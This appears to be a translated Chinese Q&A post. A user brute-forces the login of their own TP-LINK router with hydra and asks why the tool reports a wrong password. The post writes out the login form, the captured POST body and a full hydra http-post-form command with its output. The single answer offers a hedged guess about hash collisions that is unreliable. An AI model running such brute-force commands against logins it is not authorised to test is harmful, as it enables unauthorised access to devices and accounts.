0

我为我的 tplink 路由器设置了最简单的密码:aaaaaaac 默认用户是 admin

我查看了页面源代码并发现了这一点:

    <FORM METHOD="POST" ACTION="/Forms/login_security_1" name="Login_Form"><p>&nbsp;</p>
        <p>&nbsp;</p>
        <table width="540"  border="0" align=center cellpadding="0" cellspacing="0">
        <tr>
        <td><table width="100%" border="0" align=center cellpadding="0" cellspacing="0">
        <tr>
        <td height="31">&nbsp;</td><td>&nbsp;</td><td>&nbsp;</td></tr><tr>
        <td width="8%">&nbsp;</td><td width="86%" valign=top>
        <table width="86%"  border="0" align=center>
        <tr>
        <td>&nbsp;</td><td>&nbsp;</td><td>&nbsp;</td></tr><tr>
        <td align=center colspan=3 style="color:gray;font-family:Arial;text-align:left;margin:0px auto;font-size:14px;" id="tr1">
        </td><INPUT TYPE="HIDDEN" NAME="tipsFlag" VALUE="0"><INPUT TYPE="HIDDEN" NAME="timevalue" VALUE="0"><SCRIPT language="JavaScript">
        if(document.Login_Form.tipsFlag.value == 1){
        var infoStr='The username or password is incorrect,please input again.';
        document.getElementById("tr1").innerHTML = infoStr;
        }else if(document.Login_Form.tipsFlag.value == 2){
        timelast = document.Login_Form.timevalue.value;
        window.setInterval("IncreaseSec()", 1000);
        }
        </SCRIPT>
        </tr></table><table style="background-color:white" width="86%"  border="0" align=center>
        <tr>
        <td height=35>&nbsp;</td><td>&nbsp;</td><td>&nbsp;</td></tr><tr>
        <td align=right width=35%>
        <FONT color=gray><b>
        Username:</b></font>
        </td><td><INPUT TYPE="TEXT" NAME="Login_Name" SIZE="12" MAXLENGTH="31" VALUE="" class="text" onfocus="changeBorderColor(this,1);" onblur="changeBorderColor(this,0);"></td></tr><tr>
        <td height=5>&nbsp;</td><td>&nbsp;</td><td>&nbsp;</td></tr><tr>
        <td align=right >
        <FONT color=gray><b>
        Password:</b></font>
        </td><td><INPUT TYPE="PASSWORD" NAME="Login_Pwd" SIZE="12" MAXLENGTH="31" VALUE="" autocomplete="off" class="text" onfocus="changeBorderColor(this,1);" onblur="changeBorderColor(this,0);"></td></tr><tr>
        <td align=center colspan=3>
        <INPUT TYPE="BUTTON" NAME="texttpLoginBtn" VALUE="Login" class="LoginBtn" onClick="checkForm();"></td></tr><tr>
        <td align=center colspan=3>
        <INPUT TYPE="HIDDEN" NAME="uiWebLoginhiddenUsername" VALUE=""><INPUT TYPE="HIDDEN" NAME="uiWebLoginhiddenPassword" VALUE=""></td></tr><tr>
        <td height="30" colspan="3" style="text-align:center;">
        <label id="copyright" >
        Copyright &copy; 2014 TP-LINK Technologies Co., Ltd. All rights reserved.</label>
        </td></tr></table></td><td width="6%">&nbsp;</td></tr></table></td></tr></table><!-- RpZDT -->
    </form><p>&nbsp;</p>

我还查看了 POST 源代码,发现:

tipsFlag=0&timevalue=0&Login_Name=34&Login_Pwd=Ha2S%2BeOKqmzA6nrlmTeh7%3D%3D&uiWebLoginhiddenUsername=e369853df766fa44e1ed0ff613f563bduiWebLoginhiddenPassword=e369853df766fa44e1ed0ff613f563bd

所以我用这条线攻击了我自己的路由器:

hydra -f -l admin -x 8:8:a -V 192.168.1.1 http-post-form "/login_security.html/Forms/login_security_1:tipsFlag=0&timevalue=0&Login_Name=^USER^&Login_Pwd=^PASS^&uiWebLoginhiddenUsername=^USER^&uiWebLoginhiddenPassword=^PASS^:bad"

Hydra 发现密码错误

[80][http-post-form] host: 192.168.1.1   login: admin   password: aaaaaaak
[STATUS] attack finished for 192.168.1.1 (valid pair found)
1 of 1 target successfully completed, 1 valid password found

我做错了什么?

4

1 回答 1

0

我很难说出 hydra 在做什么,因为我很熟悉.. 但是很多时候密码都是经过哈希处理的,所以你不需要实际值,你只需要一个与实际密码哈希值相同的值。检查并查看 aaaaaaaak 是否可以用作路由器的登录密码,如果可以,它只是来自 za 的暴力破解,这不是您所期望的。

于 2016-12-24T18:55:33.487 回答